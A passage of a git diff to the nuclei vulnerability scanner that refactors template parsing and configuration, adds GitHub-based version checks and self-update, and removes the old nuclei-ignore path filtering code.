"github.com/projectdiscovery/nuclei/v2/pkg/protocols" "github.com/projectdiscovery/nuclei/v2/pkg/templates" "github.com/projectdiscovery/nuclei/v2/pkg/types" + "gopkg.in/yaml.v2" ) type TemplateType uint16 @@ -76,23 +78,21 @@ func (r *Runner) getParsedTemplatesFor(templatePaths, severities []string, templ // parseTemplateFile returns the parsed template file func (r *Runner) parseTemplateFile(file string) (*templates.Template, error) { - executerOpts := protocols.ExecuterOptions{ - Output: r.output, - Options: r.options, - Progress: r.progress, - Catalog: r.catalog, - IssuesClient: r.issuesClient, - RateLimiter: r.ratelimiter, - Interactsh: r.interactsh, - ProjectFile: r.projectFile, - Browser: r.browser, + f, err := os.Open(file) + if err != nil { + return nil, err } - template, err := templates.Parse(file, executerOpts) + defer f.Close() + + data, err := ioutil.ReadAll(f) if err != nil { return nil, err } - if template == nil { - return nil, nil + + template := &templates.Template{} + err = yaml.NewDecoder(bytes.NewReader(data)).Decode(template) + if err != nil { + return nil, err } return template, nil } @@ -102,19 +102,42 @@ func (r *Runner) templateLogMsg(id, name, author, severity string) string { message := fmt.Sprintf("[%s] %s (%s)", r.colorizer.BrightBlue(id).String(), r.colorizer.Bold(name).String(), - r.colorizer.BrightYellow("@"+author).String()) + r.colorizer.BrightYellow(appendAtSignToAuthors(author)).String()) if severity != "" { message += " [" + r.severityColors.Data[severity] + "]" } return message } +// appendAtSignToAuthors appends @ before each author and returns final string +func appendAtSignToAuthors(author string) string { + authors := strings.Split(author, ",") + if len(authors) == 0 { + return "@none" + } + if len(authors) == 1 { + if !strings.HasPrefix(authors[0], "@") { + return fmt.Sprintf("@%s", authors[0]) + } + return authors[0] + } + values := make([]string, 0, len(authors)) + for _, k := range authors { + if !strings.HasPrefix(authors[0], "@") { + values = append(values, fmt.Sprintf("@%s", k)) + } else { + values = append(values, k) + } + } + return strings.Join(values, ",") +} + func (r *Runner) logAvailableTemplate(tplPath string) { t, err := r.parseTemplateFile(tplPath) if err != nil { gologger.Error().Msgf("Could not parse file '%s': %s\n", tplPath, err) } else { - gologger.Print().Msgf("%s\n", r.templateLogMsg(t.ID, types.ToString(t.Info["name"]), 
types.ToString(t.Info["author"]), types.ToString(t.Info["severity"]))) + gologger.Info().Msgf("%s\n", r.templateLogMsg(t.ID, types.ToString(t.Info["name"]), types.ToString(t.Info["author"]), types.ToString(t.Info["severity"]))) } } @@ -151,38 +174,12 @@ func (r *Runner) listAvailableTemplates() { } } -func hasMatchingSeverity(templateSeverity string, allowedSeverities []string) bool { - for _, s := range allowedSeverities { - finalSeverities := []string{} - if strings.Contains(s, ",") { - finalSeverities = strings.Split(s, ",") - } else { - finalSeverities = append(finalSeverities, s) - } - - for _, sev := range finalSeverities { - sev = strings.ToLower(sev) - if sev != "" && strings.HasPrefix(templateSeverity, sev) { - return true - } - } - } - return false -} - func directoryWalker(fsPath string, callback func(fsPath string, d *godirwalk.Dirent) error) error { - err := godirwalk.Walk(fsPath, &godirwalk.Options{ + return godirwalk.Walk(fsPath, &godirwalk.Options{ Callback: callback, ErrorCallback: func(fsPath string, err error) godirwalk.ErrorAction { return godirwalk.SkipNode }, Unsorted: true, }) - - // directory couldn't be walked - if err != nil { - return err - } - - return nil } diff --git a/v2/internal/runner/update.go b/v2/internal/runner/update.go index a122ca58f0..21fc1698b3 100644 --- a/v2/internal/runner/update.go +++ b/v2/internal/runner/update.go @@ -7,21 +7,31 @@ import ( "context" "crypto/md5" "encoding/hex" + "encoding/json" "fmt" "io" "io/ioutil" "net/http" "os" + "path" "path/filepath" + "regexp" + "runtime" "strconv" "strings" "time" + "github.com/apex/log" "github.com/blang/semver" - "github.com/google/go-github/v32/github" + "github.com/google/go-github/github" "github.com/olekukonko/tablewriter" "github.com/pkg/errors" "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" + + "github.com/tj/go-update" + "github.com/tj/go-update/progress" + githubUpdateStore "github.com/tj/go-update/stores/github" ) const ( @@ -29,6 +39,13 @@ const ( repoName = "nuclei-templates" ) +const nucleiIgnoreFile = ".nuclei-ignore" + +// nucleiConfigFilename is the filename of nuclei configuration file. +const nucleiConfigFilename = ".templates-config.json" + +var reVersion = regexp.MustCompile(`\d+\.\d+\.\d+`) + // updateTemplates checks if the default list of nuclei-templates // exist in the users home directory, if not the latest revision // is downloaded from github. 
@@ -46,34 +63,44 @@ func (r *Runner) updateTemplates() error { templatesConfigFile := filepath.Join(configDir, nucleiConfigFilename) if _, statErr := os.Stat(templatesConfigFile); !os.IsNotExist(statErr) { - config, readErr := readConfiguration() + configuration, readErr := config.ReadConfiguration() if err != nil { return readErr } - r.templatesConfig = config + r.templatesConfig = configuration } ignoreURL := "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore" if r.templatesConfig == nil { - currentConfig := &nucleiConfig{ - TemplatesDirectory: filepath.Join(home, "nuclei-templates"), + currentConfig := &config.Config{ + TemplatesDirectory: path.Join(home, "nuclei-templates"), IgnoreURL: ignoreURL, - NucleiVersion: Version, + NucleiVersion: config.Version, } - if writeErr := r.writeConfiguration(currentConfig); writeErr != nil { + if writeErr := config.WriteConfiguration(currentConfig, false, false); writeErr != nil { return errors.Wrap(writeErr, "could not write template configuration") } r.templatesConfig = currentConfig } + if r.options.NoUpdateTemplates { + return nil + } // Check if last checked for nuclei-ignore is more than 1 hours. // and if true, run the check. + // + // Also at the same time fetch latest version from github to do outdated nuclei + // and templates check. + checkedIgnore := false if r.templatesConfig == nil || time.Since(r.templatesConfig.LastCheckedIgnore) > 1*time.Hour || r.options.UpdateTemplates { + r.fetchLatestVersionsFromGithub() + if r.templatesConfig != nil && r.templatesConfig.IgnoreURL != "" { ignoreURL = r.templatesConfig.IgnoreURL } gologger.Verbose().Msgf("Downloading config file from %s", ignoreURL) + checkedIgnore = true ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) req, reqErr := http.NewRequestWithContext(ctx, http.MethodGet, ignoreURL, nil) if reqErr == nil { @@ -91,7 +118,10 @@ func (r *Runner) updateTemplates() error { _ = ioutil.WriteFile(filepath.Join(configDir, nucleiIgnoreFile), data, 0644) } if r.templatesConfig != nil { - r.templatesConfig.LastCheckedIgnore = time.Now() + err = config.WriteConfiguration(r.templatesConfig, false, true) + if err != nil { + gologger.Warning().Msgf("Could not get ignore-file from %s: %s", ignoreURL, err) + } } } } @@ -100,14 +130,11 @@ func (r *Runner) updateTemplates() error { ctx := context.Background() if r.templatesConfig.CurrentVersion == "" || (r.options.TemplatesDirectory != "" && r.templatesConfig.TemplatesDirectory != r.options.TemplatesDirectory) { - if !r.options.UpdateTemplates { - gologger.Warning().Msgf("nuclei-templates are not installed (or indexed), use update-templates flag.\n") - return nil - } + gologger.Info().Msgf("nuclei-templates are not installed, installing...\n") // Use custom location if user has given a template directory - r.templatesConfig = &nucleiConfig{ - TemplatesDirectory: filepath.Join(home, "nuclei-templates"), + r.templatesConfig = &config.Config{ + TemplatesDirectory: path.Join(home, "nuclei-templates"), } if r.options.TemplatesDirectory != "" && r.options.TemplatesDirectory != filepath.Join(home, "nuclei-templates") { r.templatesConfig.TemplatesDirectory = r.options.TemplatesDirectory @@ -120,21 +147,22 @@ func (r *Runner) updateTemplates() error { } gologger.Verbose().Msgf("Downloading nuclei-templates (v%s) to %s\n", version.String(), r.templatesConfig.TemplatesDirectory) + r.fetchLatestVersionsFromGithub() // also fetch latest versions _, err = r.downloadReleaseAndUnzip(ctx, version.String(), 
asset.GetZipballURL()) if err != nil { return err } r.templatesConfig.CurrentVersion = version.String() - err = r.writeConfiguration(r.templatesConfig) + err = config.WriteConfiguration(r.templatesConfig, true, checkedIgnore) if err != nil { return err } - gologger.Info().Msgf("Successfully downloaded nuclei-templates (v%s). Enjoy!\n", version.String()) + gologger.Info().Msgf("Successfully downloaded nuclei-templates (v%s). GoodLuck!\n", version.String()) return nil } - // Check if last checked is more than 24 hours. + // Check if last checked is more than 24 hours and we don't have updateTemplates flag. // If not, return since we don't want to do anything now. if time.Since(r.templatesConfig.LastChecked) < 24*time.Hour && !r.options.UpdateTemplates { return nil @@ -161,15 +189,12 @@ func (r *Runner) updateTemplates() error { } if version.EQ(oldVersion) { - gologger.Info().Msgf("Your nuclei-templates are up to date: v%s\n", oldVersion.String()) - return r.writeConfiguration(r.templatesConfig) + return config.WriteConfiguration(r.templatesConfig, false, checkedIgnore) } if version.GT(oldVersion) { - if !r.options.UpdateTemplates { - gologger.Warning().Msgf("Your current nuclei-templates v%s are outdated. Latest is v%s\n", oldVersion, version.String()) - return r.writeConfiguration(r.templatesConfig) - } + gologger.Info().Msgf("Your current nuclei-templates v%s are outdated. Latest is v%s\n", oldVersion, version.String()) + gologger.Info().Msgf("Downloading latest release...") if r.options.TemplatesDirectory != "" { r.templatesConfig.TemplatesDirectory = r.options.TemplatesDirectory @@ -177,15 +202,16 @@ func (r *Runner) updateTemplates() error { r.templatesConfig.CurrentVersion = version.String() gologger.Verbose().Msgf("Downloading nuclei-templates (v%s) to %s\n", version.String(), r.templatesConfig.TemplatesDirectory) + r.fetchLatestVersionsFromGithub() _, err = r.downloadReleaseAndUnzip(ctx, version.String(), asset.GetZipballURL()) if err != nil { return err } - err = r.writeConfiguration(r.templatesConfig) + err = config.WriteConfiguration(r.templatesConfig, true, checkedIgnore) if err != nil { return err } - gologger.Info().Msgf("Successfully updated nuclei-templates (v%s). Enjoy!\n", version.String()) + gologger.Info().Msgf("Successfully updated nuclei-templates (v%s). 
GoodLuck!\n", version.String()) } return nil } @@ -266,8 +292,10 @@ func (r *Runner) downloadReleaseAndUnzip(ctx context.Context, version, downloadU return nil, fmt.Errorf("failed to write templates: %s", err) } - r.printUpdateChangelog(results, version) - checksumFile := filepath.Join(r.templatesConfig.TemplatesDirectory, ".checksum") + if r.options.Verbose { + r.printUpdateChangelog(results, version) + } + checksumFile := path.Join(r.templatesConfig.TemplatesDirectory, ".checksum") err = writeTemplatesChecksum(checksumFile, results.checksums) if err != nil { return nil, errors.Wrap(err, "could not write checksum") @@ -442,7 +470,7 @@ func writeTemplatesChecksum(file string, checksum map[string]string) error { } func (r *Runner) printUpdateChangelog(results *templateUpdateResults, version string) { - if len(results.additions) > 0 { + if len(results.additions) > 0 && r.options.Verbose { gologger.Print().Msgf("\nNewly added templates: \n\n") for _, addition := range results.additions { @@ -461,3 +489,108 @@ func (r *Runner) printUpdateChangelog(results *templateUpdateResults, version st } table.Render() } + +// fetchLatestVersionsFromGithub fetches latest versions of nuclei repos from github +func (r *Runner) fetchLatestVersionsFromGithub() { + nucleiLatest, err := r.githubFetchLatestTagRepo("projectdiscovery/nuclei") + if err != nil { + gologger.Warning().Msgf("Could not fetch latest nuclei release: %s", err) + } + templatesLatest, err := r.githubFetchLatestTagRepo("projectdiscovery/nuclei-templates") + if err != nil { + gologger.Warning().Msgf("Could not fetch latest nuclei-templates release: %s", err) + } + if r.templatesConfig != nil { + r.templatesConfig.NucleiLatestVersion = nucleiLatest + r.templatesConfig.NucleiTemplatesLatestVersion = templatesLatest + } +} + +type githubTagData struct { + Name string +} + +// githubFetchLatestTagRepo fetches latest tag from github +// This function was half written by github copilot AI :D. +func (r *Runner) githubFetchLatestTagRepo(repo string) (string, error) { + ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) + defer cancel() + + url := fmt.Sprintf("https://api.github.com/repos/%s/tags", repo) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil) + if err != nil { + return "", err + } + resp, err := http.DefaultClient.Do(req) + if err != nil { + return "", err + } + + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + return "", err + } + + var tags []githubTagData + err = json.Unmarshal(body, &tags) + if err != nil { + return "", err + } + if len(tags) == 0 { + return "", fmt.Errorf("no tags found for %s", repo) + } + return strings.TrimPrefix(tags[0].Name, "v"), nil +} + +// updateNucleiVersionToLatest implements nuclei auto-updation using Github Releases. 
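githubFetchLatestTagRepo above leans on the GitHub tags API returning a JSON array and takes the first entry as the latest tag; a standalone sketch of just the decode-and-trim step, with a made-up response body:

package main

import (
    "encoding/json"
    "fmt"
    "strings"
)

type githubTagData struct {
    Name string
}

func main() {
    // illustrative body from https://api.github.com/repos/<owner>/<repo>/tags
    body := []byte(`[{"name":"v2.4.2"},{"name":"v2.4.1"}]`)

    var tags []githubTagData
    if err := json.Unmarshal(body, &tags); err != nil {
        panic(err)
    }
    // the first element is treated as the latest tag; the "v" prefix is dropped
    fmt.Println(strings.TrimPrefix(tags[0].Name, "v")) // 2.4.2
}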
+func updateNucleiVersionToLatest(verbose bool) error { + if verbose { + log.SetLevel(log.DebugLevel) + } + var command string + switch runtime.GOOS { + case "windows": + command = "nuclei.exe" + default: + command = "nuclei" + } + m := &update.Manager{ + Command: command, + Store: &githubUpdateStore.Store{ + Owner: "projectdiscovery", + Repo: "nuclei", + Version: config.Version, + }, + } + releases, err := m.LatestReleases() + if err != nil { + return errors.Wrap(err, "could not fetch latest release") + } + if len(releases) == 0 { + gologger.Info().Msgf("No new updates found for nuclei engine!") + return nil + } + + latest := releases[0] + var currentOS string + switch runtime.GOOS { + case "darwin": + currentOS = "macOS" + default: + currentOS = runtime.GOOS + } + final := latest.FindZip(currentOS, runtime.GOARCH) + if final == nil { + return fmt.Errorf("no compatible binary found for %s/%s", currentOS, runtime.GOARCH) + } + tarball, err := final.DownloadProxy(progress.Reader) + if err != nil { + return errors.Wrap(err, "could not download latest release") + } + if err := m.Install(tarball); err != nil { + return errors.Wrap(err, "could not install latest release") + } + gologger.Info().Msgf("Successfully updated to Nuclei %s\n", latest.Version) + return nil +} diff --git a/v2/internal/runner/update_test.go b/v2/internal/runner/update_test.go index 8ee4e9478b..6802297797 100644 --- a/v2/internal/runner/update_test.go +++ b/v2/internal/runner/update_test.go @@ -15,6 +15,7 @@ import ( "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/nuclei/v2/internal/testutils" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" "github.com/stretchr/testify/require" ) @@ -41,8 +42,7 @@ func TestDownloadReleaseAndUnzipAddition(t *testing.T) { require.Nil(t, err, "could not create temp directory") defer os.RemoveAll(templatesDirectory) - r := &Runner{templatesConfig: &nucleiConfig{TemplatesDirectory: templatesDirectory}} - + r := &Runner{templatesConfig: &config.Config{TemplatesDirectory: templatesDirectory}, options: testutils.DefaultOptions} results, err := r.downloadReleaseAndUnzip(context.Background(), "1.0.0", ts.URL) require.Nil(t, err, "could not download release and unzip") require.Equal(t, "base.yaml", results.additions[0], "could not get correct base addition") @@ -94,7 +94,7 @@ func TestDownloadReleaseAndUnzipDeletion(t *testing.T) { require.Nil(t, err, "could not create temp directory") defer os.RemoveAll(templatesDirectory) - r := &Runner{templatesConfig: &nucleiConfig{TemplatesDirectory: templatesDirectory}} + r := &Runner{templatesConfig: &config.Config{TemplatesDirectory: templatesDirectory}, options: testutils.DefaultOptions} results, err := r.downloadReleaseAndUnzip(context.Background(), "1.0.0", ts.URL) require.Nil(t, err, "could not download release and unzip") diff --git a/v2/internal/testutils/integration.go b/v2/internal/testutils/integration.go index 47d7e477ba..1f59c30118 100644 --- a/v2/internal/testutils/integration.go +++ b/v2/internal/testutils/integration.go @@ -1,15 +1,17 @@ package testutils import ( + "errors" "net" "os" "os/exec" + "regexp" "strings" ) // RunNucleiAndGetResults returns a list of results for a template func RunNucleiAndGetResults(template, url string, debug bool, extra ...string) ([]string, error) { - cmd := exec.Command("./nuclei", "-t", template, "-target", url) + cmd := exec.Command("./nuclei", "-t", template, "-target", url, "-silent") if debug { cmd = exec.Command("./nuclei", "-t", template, "-target", url, "-debug") 
cmd.Stderr = os.Stderr @@ -30,9 +32,26 @@ func RunNucleiAndGetResults(template, url string, debug bool, extra ...string) ( return parts, nil } +var templateLoaded = regexp.MustCompile(`(?:Templates|Workflows) loaded: (\d+)`) + +// RunNucleiAndGetResults returns a list of results for a template +func RunNucleiBinaryAndGetLoadedTemplates(nucleiBinary string, args []string) (string, error) { + cmd := exec.Command(nucleiBinary, args...) + + data, err := cmd.CombinedOutput() + if err != nil { + return "", err + } + matches := templateLoaded.FindAllStringSubmatch(string(data), -1) + if len(matches) == 0 { + return "", errors.New("no matches found") + } + return matches[0][1], nil +} + // RunNucleiWorkflowAndGetResults returns a list of results for a workflow func RunNucleiWorkflowAndGetResults(template, url string, debug bool, extra ...string) ([]string, error) { - cmd := exec.Command("./nuclei", "-w", template, "-target", url) + cmd := exec.Command("./nuclei", "-w", template, "-target", url, "-silent") if debug { cmd = exec.Command("./nuclei", "-w", template, "-target", url, "-debug") cmd.Stderr = os.Stderr diff --git a/v2/internal/testutils/testutils.go b/v2/internal/testutils/testutils.go index 93c8b2fd94..b6f1bf0747 100644 --- a/v2/internal/testutils/testutils.go +++ b/v2/internal/testutils/testutils.go @@ -19,43 +19,42 @@ func Init(options *types.Options) { // DefaultOptions is the default options structure for nuclei during mocking. var DefaultOptions = &types.Options{ - Metrics: false, - Debug: false, - DebugRequests: false, - DebugResponse: false, - Silent: false, - Version: false, - Verbose: false, - NoColor: true, - UpdateTemplates: false, - JSON: false, - JSONRequests: false, - EnableProgressBar: false, - TemplatesVersion: false, - TemplateList: false, - Stdin: false, - StopAtFirstMatch: false, - NoMeta: false, - Project: false, - MetricsPort: 0, - BulkSize: 25, - TemplateThreads: 10, - Timeout: 5, - Retries: 1, - RateLimit: 150, - BurpCollaboratorBiid: "", - ProjectPath: "", - Severity: []string{}, - Target: "", - Targets: "", - Output: "", - ProxyURL: "", - ProxySocksURL: "", - TemplatesDirectory: "", - TraceLogFile: "", - Templates: []string{}, - ExcludedTemplates: []string{}, - CustomHeaders: []string{}, + Metrics: false, + Debug: false, + DebugRequests: false, + DebugResponse: false, + Silent: false, + Version: false, + Verbose: false, + NoColor: true, + UpdateTemplates: false, + JSON: false, + JSONRequests: false, + EnableProgressBar: false, + TemplatesVersion: false, + TemplateList: false, + Stdin: false, + StopAtFirstMatch: false, + NoMeta: false, + Project: false, + MetricsPort: 0, + BulkSize: 25, + TemplateThreads: 10, + Timeout: 5, + Retries: 1, + RateLimit: 150, + ProjectPath: "", + Severity: []string{}, + Targets: []string{}, + TargetsFilePath: "", + Output: "", + ProxyURL: "", + ProxySocksURL: "", + TemplatesDirectory: "", + TraceLogFile: "", + Templates: []string{}, + ExcludedTemplates: []string{}, + CustomHeaders: []string{}, } // MockOutputWriter is a mocked output writer. 
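RunNucleiBinaryAndGetLoadedTemplates above scrapes the template count out of nuclei's combined output with the templateLoaded expression; a small standalone sketch of that extraction, assuming the binary prints a line of the form "Templates loaded: N":

package main

import (
    "fmt"
    "regexp"
)

var templateLoaded = regexp.MustCompile(`(?:Templates|Workflows) loaded: (\d+)`)

func main() {
    // illustrative combined stdout/stderr of a nuclei run
    out := "[INF] Using Nuclei Engine 2.4.3-dev\n[INF] Templates loaded: 12\n"

    matches := templateLoaded.FindAllStringSubmatch(out, -1)
    if len(matches) == 0 {
        fmt.Println("no matches found")
        return
    }
    fmt.Println(matches[0][1]) // 12
}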
@@ -102,7 +101,7 @@ type TemplateInfo struct { // NewMockExecuterOptions creates a new mock executeroptions struct func NewMockExecuterOptions(options *types.Options, info *TemplateInfo) *protocols.ExecuterOptions { - progressImpl, _ := progress.NewStatsTicker(0, false, false, 0) + progressImpl, _ := progress.NewStatsTicker(0, false, false, false, 0) executerOpts := &protocols.ExecuterOptions{ TemplateID: info.ID, TemplateInfo: info.Info, diff --git a/v2/pkg/catalog/catalogue.go b/v2/pkg/catalog/catalogue.go index c085e5c2de..38a58d7cc0 100644 --- a/v2/pkg/catalog/catalogue.go +++ b/v2/pkg/catalog/catalogue.go @@ -2,7 +2,6 @@ package catalog // Catalog is a template catalog helper implementation type Catalog struct { - ignoreFiles []string templatesDirectory string } @@ -11,8 +10,3 @@ func New(directory string) *Catalog { catalog := &Catalog{templatesDirectory: directory} return catalog } - -// AppendIgnore appends to the catalog store ignore list. -func (c *Catalog) AppendIgnore(list []string) { - c.ignoreFiles = append(c.ignoreFiles, list...) -} diff --git a/v2/pkg/catalog/config/config.go b/v2/pkg/catalog/config/config.go new file mode 100644 index 0000000000..478ef3793b --- /dev/null +++ b/v2/pkg/catalog/config/config.go @@ -0,0 +1,138 @@ +package config + +import ( + "os" + "path" + "time" + + jsoniter "github.com/json-iterator/go" + "github.com/pkg/errors" + "github.com/projectdiscovery/gologger" + "gopkg.in/yaml.v2" +) + +// Config contains the internal nuclei engine configuration +type Config struct { + TemplatesDirectory string `json:"templates-directory,omitempty"` + CurrentVersion string `json:"current-version,omitempty"` + LastChecked time.Time `json:"last-checked,omitempty"` + IgnoreURL string `json:"ignore-url,omitempty"` + NucleiVersion string `json:"nuclei-version,omitempty"` + LastCheckedIgnore time.Time `json:"last-checked-ignore,omitempty"` + + NucleiLatestVersion string `json:"nuclei-latest-version"` + NucleiTemplatesLatestVersion string `json:"nuclei-templates-latest-version"` +} + +// nucleiConfigFilename is the filename of nuclei configuration file. +const nucleiConfigFilename = ".templates-config.json" + +// Version is the current version of nuclei +const Version = `2.4.3-dev` + +func getConfigDetails() (string, error) { + homeDir, err := os.UserHomeDir() + if err != nil { + return "", errors.Wrap(err, "could not get home directory") + } + configDir := path.Join(homeDir, "/.config", "/nuclei") + _ = os.MkdirAll(configDir, os.ModePerm) + templatesConfigFile := path.Join(configDir, nucleiConfigFilename) + return templatesConfigFile, nil +} + +// ReadConfiguration reads the nuclei configuration file from disk. 
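Given the JSON tags on Config above, the on-disk ~/.config/nuclei/.templates-config.json is plain JSON; a trimmed-down sketch of what a written file might contain (field values are made up, and encoding/json stands in for jsoniter purely to keep the example short):

package main

import (
    "encoding/json"
    "fmt"
)

// a subset of the Config fields above, with the same JSON tags
type Config struct {
    TemplatesDirectory  string `json:"templates-directory,omitempty"`
    CurrentVersion      string `json:"current-version,omitempty"`
    NucleiVersion       string `json:"nuclei-version,omitempty"`
    NucleiLatestVersion string `json:"nuclei-latest-version"`
}

func main() {
    c := &Config{
        TemplatesDirectory:  "/home/user/nuclei-templates",
        CurrentVersion:      "8.4.2",
        NucleiVersion:       "2.4.3-dev",
        NucleiLatestVersion: "2.4.2",
    }
    out, _ := json.MarshalIndent(c, "", "  ")
    fmt.Println(string(out))
}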
+func ReadConfiguration() (*Config, error) { + templatesConfigFile, err := getConfigDetails() + if err != nil { + return nil, err + } + + file, err := os.Open(templatesConfigFile) + if err != nil { + return nil, err + } + defer file.Close() + + config := &Config{} + err = jsoniter.NewDecoder(file).Decode(config) + if err != nil { + return nil, err + } + return config, nil +} + +// WriteConfiguration writes the updated nuclei configuration to disk +func WriteConfiguration(config *Config, checked, checkedIgnore bool) error { + if config.IgnoreURL == "" { + config.IgnoreURL = "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore" + } + if checked { + config.LastChecked = time.Now() + } + if checkedIgnore { + config.LastCheckedIgnore = time.Now() + } + config.NucleiVersion = Version + + templatesConfigFile, err := getConfigDetails() + if err != nil { + return err + } + file, err := os.OpenFile(templatesConfigFile, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0777) + if err != nil { + return err + } + defer file.Close() + + err = jsoniter.NewEncoder(file).Encode(config) + if err != nil { + return err + } + return nil +} + +const nucleiIgnoreFile = ".nuclei-ignore" + +// IgnoreFile is an internal nuclei template blocking configuration file +type IgnoreFile struct { + Tags []string `yaml:"tags"` + Files []string `yaml:"files"` +} + +// ReadIgnoreFile reads the nuclei ignore file returning blocked tags and paths +func ReadIgnoreFile() IgnoreFile { + file, err := os.Open(getIgnoreFilePath()) + if err != nil { + gologger.Error().Msgf("Could not read nuclei-ignore file: %s\n", err) + return IgnoreFile{} + } + defer file.Close() + + ignore := IgnoreFile{} + if err := yaml.NewDecoder(file).Decode(&ignore); err != nil { + gologger.Error().Msgf("Could not parse nuclei-ignore file: %s\n", err) + return IgnoreFile{} + } + return ignore +} + +// getIgnoreFilePath returns the ignore file path for the runner +func getIgnoreFilePath() string { + var defIgnoreFilePath string + + home, err := os.UserHomeDir() + if err == nil { + configDir := path.Join(home, "/.config", "/nuclei") + _ = os.MkdirAll(configDir, os.ModePerm) + + defIgnoreFilePath = path.Join(configDir, nucleiIgnoreFile) + return defIgnoreFilePath + } + cwd, err := os.Getwd() + if err != nil { + return defIgnoreFilePath + } + cwdIgnoreFilePath := path.Join(cwd, nucleiIgnoreFile) + return cwdIgnoreFilePath +} diff --git a/v2/pkg/catalog/find.go b/v2/pkg/catalog/find.go index f5c54f2cf8..92e6d47f92 100644 --- a/v2/pkg/catalog/find.go +++ b/v2/pkg/catalog/find.go @@ -11,7 +11,7 @@ import ( ) // GetTemplatesPath returns a list of absolute paths for the provided template list. 
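ReadIgnoreFile above expects .nuclei-ignore to be a small YAML document with tags and files keys; a standalone sketch of that decode with made-up entries:

package main

import (
    "fmt"
    "strings"

    "gopkg.in/yaml.v2"
)

type IgnoreFile struct {
    Tags  []string `yaml:"tags"`
    Files []string `yaml:"files"`
}

func main() {
    // illustrative .nuclei-ignore contents
    raw := "tags:\n  - dos\n  - fuzz\nfiles:\n  - workflows/\n"

    ignore := IgnoreFile{}
    if err := yaml.NewDecoder(strings.NewReader(raw)).Decode(&ignore); err != nil {
        panic(err)
    }
    fmt.Println(ignore.Tags, ignore.Files) // [dos fuzz] [workflows/]
}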
-func (c *Catalog) GetTemplatesPath(definitions []string, noCheckIgnore bool) []string { +func (c *Catalog) GetTemplatesPath(definitions []string) []string { // keeps track of processed dirs and files processed := make(map[string]bool) allTemplates := []string{} @@ -22,18 +22,12 @@ func (c *Catalog) GetTemplatesPath(definitions []string, noCheckIgnore bool) []s gologger.Error().Msgf("Could not find template '%s': %s\n", t, err) } for _, path := range paths { - if !noCheckIgnore && c.checkIfInNucleiIgnore(path) { - continue - } if _, ok := processed[path]; !ok { processed[path] = true allTemplates = append(allTemplates, path) } } } - if len(allTemplates) > 0 { - gologger.Verbose().Msgf("Identified %d templates", len(allTemplates)) - } return allTemplates } diff --git a/v2/pkg/catalog/ignore.go b/v2/pkg/catalog/ignore.go deleted file mode 100644 index c3ecb99104..0000000000 --- a/v2/pkg/catalog/ignore.go +++ /dev/null @@ -1,58 +0,0 @@ -package catalog - -import ( - "strings" - - "github.com/projectdiscovery/gologger" -) - -// checkIfInNucleiIgnore checks if a path falls under nuclei-ignore rules. -func (c *Catalog) checkIfInNucleiIgnore(item string) bool { - if c.templatesDirectory == "" { - return false - } - - matched := false - for _, paths := range c.ignoreFiles { - if !strings.HasSuffix(paths, ".yaml") { - if strings.HasSuffix(strings.TrimSuffix(item, "/"), strings.TrimSuffix(paths, "/")) { - matched = true - break - } - } else if strings.HasSuffix(item, paths) { - matched = true - break - } - } - if matched { - gologger.Warning().Msgf("Excluding %s due to nuclei-ignore filter", item) - return true - } - return false -} - -// ignoreFilesWithExcludes ignores results with exclude paths -func (c *Catalog) ignoreFilesWithExcludes(results, excluded []string) []string { - var templates []string - - for _, result := range results { - matched := false - for _, paths := range excluded { - if !strings.HasSuffix(paths, ".yaml") { - if strings.HasSuffix(strings.TrimSuffix(result, "/"), strings.TrimSuffix(paths, "/")) { - matched = true - break - } - } else if strings.HasSuffix(result, paths) { - matched = true - break - } - } - if !matched { - templates = append(templates, result) - } else { - gologger.Error().Msgf("Excluding %s due to excludes filter", result) - } - } - return templates -} diff --git a/v2/pkg/catalog/ignore_test.go b/v2/pkg/catalog/ignore_test.go deleted file mode 100644 index 845696a4f2..0000000000 --- a/v2/pkg/catalog/ignore_test.go +++ /dev/null @@ -1,40 +0,0 @@ -package catalog - -import ( - "fmt" - "testing" - - "github.com/stretchr/testify/require" -) - -func TestIgnoreFilesIgnore(t *testing.T) { - c := &Catalog{ - ignoreFiles: []string{"workflows/", "cves/2020/cve-2020-5432.yaml"}, - templatesDirectory: "test", - } - tests := []struct { - path string - ignore bool - }{ - {"workflows/", true}, - {"misc", false}, - {"cves/", false}, - {"cves/2020/cve-2020-5432.yaml", true}, - {"/Users/test/nuclei-templates/workflows/", true}, - {"/Users/test/nuclei-templates/misc", false}, - {"/Users/test/nuclei-templates/cves/", false}, - {"/Users/test/nuclei-templates/cves/2020/cve-2020-5432.yaml", true}, - } - for _, test := range tests { - require.Equal(t, test.ignore, c.checkIfInNucleiIgnore(test.path), fmt.Sprintf("could not ignore file correctly: %v", test)) - } -} - -func TestExcludeFilesIgnore(t *testing.T) { - c := &Catalog{} - excludes := []string{"workflows/", "cves/2020/cve-2020-5432.yaml"} - paths := []string{"/Users/test/nuclei-templates/workflows/", 
"/Users/test/nuclei-templates/cves/2020/cve-2020-5432.yaml", "/Users/test/nuclei-templates/workflows/test-workflow.yaml", "/Users/test/nuclei-templates/cves/"} - - data := c.ignoreFilesWithExcludes(paths, excludes) - require.Equal(t, []string{"/Users/test/nuclei-templates/workflows/test-workflow.yaml", "/Users/test/nuclei-templates/cves/"}, data, "could not exclude correct files") -} diff --git a/v2/pkg/catalog/loader/filter/path_filter.go b/v2/pkg/catalog/loader/filter/path_filter.go new file mode 100644 index 0000000000..f938dcff72 --- /dev/null +++ b/v2/pkg/catalog/loader/filter/path_filter.go @@ -0,0 +1,45 @@ +package filter + +import "github.com/projectdiscovery/nuclei/v2/pkg/catalog" + +// PathFilter is a path based template filter +type PathFilter struct { + excludedTemplates []string + alwaysIncludedTemplatesMap map[string]struct{} +} + +// PathFilterConfig contains configuration options for Path based templates Filter +type PathFilterConfig struct { + IncludedTemplates []string + ExcludedTemplates []string +} + +// NewPathFilter creates a new path filter from provided config +func NewPathFilter(config *PathFilterConfig, catalogClient *catalog.Catalog) *PathFilter { + filter := &PathFilter{ + excludedTemplates: catalogClient.GetTemplatesPath(config.ExcludedTemplates), + 